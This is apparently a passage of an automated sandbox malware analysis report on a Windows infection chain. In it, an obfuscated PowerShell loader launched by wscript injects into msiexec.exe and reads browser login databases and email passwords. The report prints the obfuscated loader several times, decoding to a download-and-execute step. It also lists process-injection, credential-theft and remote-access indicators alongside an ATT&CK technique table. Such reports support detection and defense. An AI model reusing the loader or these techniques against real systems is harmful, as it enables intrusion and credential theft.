              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,12_2_004044A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23594AB4 mov eax, dword ptr fs:[00000030h]9_2_23594AB4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_2359724E GetProcessHeap,9_2_2359724E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_23592B1C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_23592639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_235960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_235960E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: Yara matchFile source: amsi64_1908.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 988, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3E60000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Offentlighedslovgivninger Raakremers Miljforstyrrelserne Daarligst Coniferous #>;$selsret='Valgets';<#Glattede Microscopal Jordvarmeanlggets Confirmatory Onerative Rheobase #>;$Dks=$Leuma+$host.UI;If ($Dks) {$syltetjskrukke++;}function Capulet43($Blimpishly){$Unvomitednefficiencies=$Berendo+$Blimpishly.'Length'-$syltetjskrukke; for( $Unvomited=3;$Unvomited -lt $Unvomitednefficiencies;$Unvomited+=4){$Mythol++;$Overpositiveness+=$Blimpishly[$Unvomited];$Fatalismens='Usurption';}$Overpositiveness;}function Donought($Folkeskolerne){ & ($afire) ($Folkeskolerne);}$Prestigiously100=Capulet43 'BloMCheo rz dei MulDerlsvia En/Ret ';$Prestigiously100+=Capulet43 'Ca 5Kae. Mo0sk I,d(D pWGa.isvune.edBodoOpdwConsCre Ph,N K.T ac b m1Nob0Fol. ,a0di ;Met RbdW ,ai,tin.or6 No4Bou;Tr, Tex .a6N t4 Un;Ret sp.rCouvF l:No,1In 3 Mi1Eld.Par0Al.)Tur GerGMyresrncAssk Bro De/B g2Tat0B r1Bro0 s 0P.r1Rev0Unm1.ro OrrFGl iBegr Que.rofOrio Opxmav/T,r1Kin3U e1 sk.Mic0Jos ';$Extrality=Capulet43 ' yguseksDefefi R Af-Am,AOpsgTrvetraNTret .n ';$Dolkhalerne=Capulet43 'Naph HatLvhtPropFu.:Bef/Ter/GyslsemnFem6BokbEl,9sub.Unes UnhVe oegap os/RalaQuimrecy.edkD.thsukRL ec BiMRet/ FlR ReeDigdsteoZn b relseliConn,ingPhi.Fo pPrissbed ,o ';$Unvomitednddelingens=Capulet43 'P.a> si ';$afire=Capulet43 'BilIEupEsp XE,t ';$Ceratitidae='goldsmithing';$Udskrivningsprogrammets='\Enspnderen.rep';Donought (Capulet43 'sun$GraG ,oLHenOTomB ekaA rL Uf: ,aMR,sEDiadEnsIBlgCC liBioN LnE,ar=Ple$P geWo,nYv vnav:s cAUdspHiePBesDMisAEuttsmaA T,+Eph$Fa URygdPies.ymK laR GliBayvLisnAzoI KoNskrg RisRdlpsalRRygoD sG E R .yA ChmlapMMule .rTMo s la ');Donought (Capulet43 'spi$UdmgCrilManO urBIm.a lmL Fo:Park WoOMe nInsssv oFolL siiEksdT aEFilr iqIMurnc.aGC,s=Eja$DegD Beos.plslaksarHOstaParLTile U RfirNspje Fu. issLizPUnplPeriK fTMul( y$ PoUArbN unvBuro,remsayiFletB,lEOs DB nn RedsotDGr.EsimLBeniOveNFi gProE NonNevsBge)Red ');Donought (Capulet43 'Cyk[L,nnHypERenT od. s sF.nECauRLynvDatIMa cMulescep jaoProI spnNontTemMHj AImpn.veACapgTacEEquR Re]De :,mp:Ra,sM seModc enUVinrD ciC ltAmpyGripGriRRoro HetHanO H C B ORe l.og En =r r pit[Inan isE NoTsk..AutsNatEFl c R U D RTraI.abT esYM.gP nrM no agT e OObdC ysoF iLBrst say,aspAdeeUbe]Gro:sem:Ka tsp Ls isPou1 La2 a ');$Dolkhalerne=$Konsolidering[0];$skovskadens177=(Capulet43 ' st$TilgP slHa Om sbI.da P LR v: aFMu.ONond BafLansN nT,ndEHypRkonNAftE elss a= HvnHocE OswFib-sa,oshiBsubj CrER dC eaTG r ErysCurY ,gsValtUndE t,mDoc.UnvN.paE FotK.n.IntW sye keB uc I L ri roeZenn ReTCou ');Donought ($skovskadens177);Donought (Capulet43 'Acc$MasfunpoOpbdUnsfOptsun t Aresk rHy n nueAfdsCa . H H.rseAfgaG odKnie InrbarsGry[In $P oEUn xD ttVierArtaUfolFriiVoctC uyPre] .t=Ena$ L,PTo,rE.beForsKu tApoiNongCo,iTetoshiuDa sIn.l.alysla1ste0 Ab0Raa ');$Taarnfalkes=Capulet43 'K e$KryfDhuoProdFrsf .asMeutvereFrorskrnUdbeVens rg.FraDT ao PowkacnUdblskrorepa skd saFMo i RelBlJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ncxgt"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ywcrugzm"Jump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\izpjvzjnjwl"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relbl
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relbl
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#offentlighedslovgivninger raakremers miljforstyrrelserne daarligst coniferous #>;$selsret='valgets';<#glattede microscopal jordvarmeanlggets confirmatory onerative rheobase #>;$dks=$leuma+$host.ui;if ($dks) {$syltetjskrukke++;}function capulet43($blimpishly){$unvomitednefficiencies=$berendo+$blimpishly.'length'-$syltetjskrukke; for( $unvomited=3;$unvomited -lt $unvomitednefficiencies;$unvomited+=4){$mythol++;$overpositiveness+=$blimpishly[$unvomited];$fatalismens='usurption';}$overpositiveness;}function donought($folkeskolerne){ & ($afire) ($folkeskolerne);}$prestigiously100=capulet43 'blomcheo rz dei mulderlsvia en/ret ';$prestigiously100+=capulet43 'ca 5kae. mo0sk i,d(d pwga.isvune.edbodoopdwconscre ph,n k.t ac b m1nob0fol. ,a0di ;met rbdw ,ai,tin.or6 no4bou;tr, tex .a6n t4 un;ret sp.rcouvf l:no,1in 3 mi1eld.par0al.)tur gergmyresrncassk bro de/b g2tat0b r1bro0 s 0p.r1rev0unm1.ro orrfgl ibegr que.roforio opxmav/t,r1kin3u e1 sk.mic0jos ';$extrality=capulet43 ' yguseksdefefi r af-am,aopsgtrvetrantret .n ';$dolkhalerne=capulet43 'naph hatlvhtpropfu.:bef/ter/gyslsemnfem6bokbel,9sub.unes unhve oegap os/ralaquimrecy.edkd.thsukrl ec bimret/ flr reedigdsteozn b relseliconn,ingphi.fo pprissbed ,o ';$unvomitednddelingens=capulet43 'p.a> si ';$afire=capulet43 'bilieupesp xe,t ';$ceratitidae='goldsmithing';$udskrivningsprogrammets='\enspnderen.rep';donought (capulet43 'sun$grag ,olhenotomb ekaa rl uf: ,amr,sediadensiblgcc libion lne,ar=ple$p gewo,nyv vnav:s caudsphiepbesdmisaeuttsmaa t,+eph$fa urygdpies.ymk lar glibayvlisnazoi konskrg risrdlpsalrrygod sg e r .ya chmlapmmule .rtmo s la ');donought (capulet43 'spi$udmgcrilmano urbim.a lml fo:park woome ninsssv ofoll siieksdt aefilr iqimurnc.agc,s=eja$degd beos.plslaksarhostaparltile u rfirnspje fu. isslizpunplperik ftmul( y$ pouarbn unvburo,remsayifletb,leos db nn redsotdgr.esimlbeniovenfi gproe nonnevsbge)red ');donought (capulet43 'cyk[l,nnhyperent od. s sf.necaurlynvdatima cmulescep jaoproi spnnonttemmhj aimpn.veacapgtaceequr re]de :,mp:ra,sm semodc enuvinrd cic ltampygripgrirroro hethano h c b ore l.og en =r r pit[inan ise notsk..autsnatefl c r u d rtrai.abt esym.gp nrm no agt e oobdc ysof ilbrst say,aspadeeube]gro:sem:ka tsp ls ispou1 la2 a ');$dolkhalerne=$konsolidering[0];$skovskadens177=(capulet43 ' st$tilgp slha om sbi.da p lr v: afmu.onond baflansn nt,ndehyprkonnafte elss a= hvnhoce oswfib-sa,oshibsubj crer dc eatg r eryscury ,gsvaltunde t,mdoc.unvn.pae fotk.n.intw sye keb uc i l ri roezenn retcou ');donought ($skovskadens177);donought (capulet43 'acc$masfunpoopbdunsfoptsun t aresk rhy n nueafdsca . h h.rseafgag odknie inrbarsgry[in $p oeun xd ttvierartaufolfriivoctc uypre] .t=ena$ l,pto,re.beforsku tapoinongco,itetoshiuda sin.l.alysla1ste0 ab0raa ');$taarnfalkes=capulet43 'k e$kryfdhuoprodfrsf .asmeutverefrorskrnudbevens rg.fradt ao powkacnudblskrorepa skd safmo i relblJump to behavior
              Source: msiexec.exe, 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592933 cpuid 9_2_23592933
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_23592264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_23592264
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0041739B GetVersionExW,12_2_0041739B
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword13_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword13_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword13_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UXHRJ7Jump to behavior
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3406381912.0000000007BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6448, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts11
              Windows Management Instrumentation
              321
              Scripting
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Native API
              1
              DLL Side-Loading
              1
              Access Token Manipulation
              3
              Obfuscated Files or Information
              1
              Credentials in Registry
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)412
              Process Injection
              1
              Software Packing
              Security Account Manager2
              File and Directory Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS28
              System Information Discovery
              Distributed Component Object ModelInput Capture1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets141
              Security Software Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion
              Cached Domain Credentials31
